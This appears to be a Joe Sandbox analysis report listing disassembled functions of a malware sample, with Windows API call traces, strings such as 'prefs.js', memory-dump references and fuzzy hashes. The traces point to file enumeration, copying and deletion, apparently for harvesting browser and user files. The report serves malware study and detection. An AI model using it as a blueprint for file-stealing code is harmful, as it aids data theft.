Function 0081C0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0081C15C
StrCmpCA.SHLWAPI(?,004213F8), ref: 0081C1B4
StrCmpCA.SHLWAPI(?,004213FC), ref: 0081C1CA
FindNextFileA.KERNEL32(000000FF,?), ref: 0081CA26
FindClose.KERNEL32(000000FF), ref: 0081CA38

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
Instruction ID: 05f6502e87e9abd48108353c21412cc166364563283d3a631a8091de76a04973
Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
Instruction Fuzzy Hash: 6E420E72910128ABCB18FBA8ED96EED737DFF54700F404568B50AD6191EE349B88CB53

Function 008247D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247E7
RtlAllocateHeap.NTDLL(00000000), ref: 008247EE
wsprintfA.USER32 ref: 0082480D
FindFirstFileA.KERNEL32(?,?), ref: 00824824
StrCmpCA.SHLWAPI(?,00420FC4), ref: 00824852
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00824868
FindNextFileA.KERNEL32(000000FF,?), ref: 008248F2
FindClose.KERNEL32(000000FF), ref: 00824907
lstrcat.KERNEL32(?,0064A524), ref: 0082492C
lstrcat.KERNEL32(?,0064A22C), ref: 0082493F
lstrlen.KERNEL32(?), ref: 0082494C
lstrlen.KERNEL32(?), ref: 0082495D

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID:
API String ID: 671575355-0
Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
Instruction ID: 8eea8ffe75b0af18314a81edf19b10b89bc1fffd11bf4752c1bda08d9ff8d787
Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
Instruction Fuzzy Hash: 655183B9590218ABCB24EBB4DC89FE9737DFF58700F405588B649D2190DB749BC48FA2

Function 0040ED20 Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
FindClose.KERNEL32(000000FF), ref: 0040F2C3

Strings

1#v, xrefs: 0040ED55
P2#v, xrefs: 0040F2AE
%s\*.*, xrefs: 0040ED32

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*$P2#v$1#v
API String ID: 180737720-3139634048
Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69

Function 0040DE10 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
FindClose.KERNEL32(000000FF), ref: 0040E3F2

Strings

1#v, xrefs: 0040DE5E
P2#v, xrefs: 0040E3E0
\*.*, xrefs: 0040DE26
4@, xrefs: 0040DE32, 0040E400, 0040DEF3, 0040DE75, 0040DEF6

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$P2#v$\*.*$1#v
API String ID: 2325840235-3454896120
Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69

Function 0040F6B0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
FindClose.KERNEL32(000000FF), ref: 0040FAC3

Strings

1#v, xrefs: 0040F71E
P2#v, xrefs: 0040FAB1
prefs.js, xrefs: 0040F812

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: P2#v$prefs.js$1#v
API String ID: 3334442632-2885088814
Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A

Function 0040DA80 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
FindClose.KERNEL32(000000FF), ref: 0040DDDE

Strings

1#v, xrefs: 0040DAEB
P2#v, xrefs: 0040DDCC

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: P2#v$1#v
API String ID: 3334442632-762677545
Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A

Function 00824107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0082412A
FindFirstFileA.KERNEL32(?,?), ref: 00824141
StrCmpCA.SHLWAPI(?,00420FAC), ref: 0082416F
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00824185
FindNextFileA.KERNEL32(000000FF,?), ref: 008242D3
FindClose.KERNEL32(000000FF), ref: 008242E8

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
Instruction ID: b2470830ce712e74934315cbfa020e2e86d6752c09e7ca28629079fbd03eec65
Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
Instruction Fuzzy Hash: FE5151B5940228ABCB24EBB4ED89EEA737DFF54300F00458CB659D2180DB759BC58FA5

Function 004016D0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
DeleteFileA.KERNEL32(00000000), ref: 00401DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
FindClose.KERNEL32(000000FF), ref: 00401E32

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Strings

1#v, xrefs: 00401923
P2#v, xrefs: 00401E20
\*.*, xrefs: 004017F1

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: P2#v$\*.*$1#v
API String ID: 1415058207-2075649900
Opcode ID: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
Opcode Fuzzy Hash: 6b77bc6ce782c52a4be10e050969eba881b4cf3ff4cfc38040b618d0c041b4e5
Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9

Function 0040E430 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF

Strings

1#v, xrefs: 0040E4A2
P2#v, xrefs: 0040EBDF
@, xrefs: 0040EBF5, 0040E5EB, 0040E71C, 0040E85B, 0040E4B9, 0040E5EE, 0040E71F, 0040E85E
\*.*, xrefs: 0040E44D

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: P2#v$\*.*$1#v$@
API String ID: 433455689-1092267622
Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA

Function 0081EF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0081EFA5
FindFirstFileA.KERNEL32(?,?), ref: 0081EFBC
StrCmpCA.SHLWAPI(?,00421538), ref: 0081F012
StrCmpCA.SHLWAPI(?,0042153C), ref: 0081F028
FindNextFileA.KERNEL32(000000FF,?), ref: 0081F515
FindClose.KERNEL32(000000FF), ref: 0081F52A

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
Instruction ID: cace048ba317f8188a73e7f588e0d042b119032307c151598a9f3f31b6795c7f
Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
Instruction Fuzzy Hash: B9E1DC719112389BDB18EB64ED92EEE7379FF54700F4041E9B50AA2492EE305BC9CF52

Function 0081DCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0081DD52
StrCmpCA.SHLWAPI(?,004214B4), ref: 0081DD9A
StrCmpCA.SHLWAPI(?,004214B8), ref: 0081DDB0
FindNextFileA.KERNEL32(000000FF,?), ref: 0081E033
FindClose.KERNEL32(000000FF), ref: 0081E045

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
Instruction ID: 6656886a2af39ada9900ad19b5fe1829e5e5b5d448bd1a3509575943d9dbfb35
Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
Instruction Fuzzy Hash: 319110729002289BCB18FBB4ED96AED737DFF95300F004558B54AD6141EE349B98CB93

Function 0081F917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0081F985
StrCmpCA.SHLWAPI(?,004215BC), ref: 0081F9D6
StrCmpCA.SHLWAPI(?,004215C0), ref: 0081F9EC
FindNextFileA.KERNEL32(000000FF,?), ref: 0081FD18
FindClose.KERNEL32(000000FF), ref: 0081FD2A

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
Instruction ID: 9be3760ad308608ca05c3e3a4db39a3ed6fb7552af44b6ea5e17d8eef135e64f
Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
Instruction Fuzzy Hash: 86B11071900228DBCB28EF64ED96AED7379FF55300F4041A9A50AD6152EF305B88CF93

Function 00811937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 00811B8A
StrCmpCA.SHLWAPI(?,00425264), ref: 00811BDA
StrCmpCA.SHLWAPI(?,0042530C), ref: 00811BF0
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00811FA7
DeleteFileA.KERNEL32(00000000), ref: 00812031
FindNextFileA.KERNEL32(000000FF,?), ref: 00812087
FindClose.KERNEL32(000000FF), ref: 00812099

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID:
API String ID: 1415058207-0
Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
Instruction ID: 99b2b18d167e06e1deda47b53fbc7400c24531e7be2afb1f8acc50d54f664445
Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
Instruction Fuzzy Hash: 4D12A671910228DBCF1DEB64ED96AEDB379FF54700F4045A9B10AA2091EF706BC8CE52

Function 0081E077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0081E0C5
StrCmpCA.SHLWAPI(?,004214C8), ref: 0081E115
StrCmpCA.SHLWAPI(?,004214CC), ref: 0081E12B
FindNextFileA.KERNEL32(000000FF,?), ref: 0081E647
FindClose.KERNEL32(000000FF), ref: 0081E659

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID:
API String ID: 2325840235-0
Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
Instruction ID: 0c24cdda16b43807ba4be0fcca0c5572977338b6c04b9c073a53b8dcbf18822b
Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
Instruction Fuzzy Hash: 40F18B71910238DBCB1DEB64ED95AEEB379FF14700F4041DAA04AA2491EF346BC9CE52

Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
LocalFree.KERNEL32(00000000), ref: 00417D22

Strings

/ , xrefs: 00417C7F

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

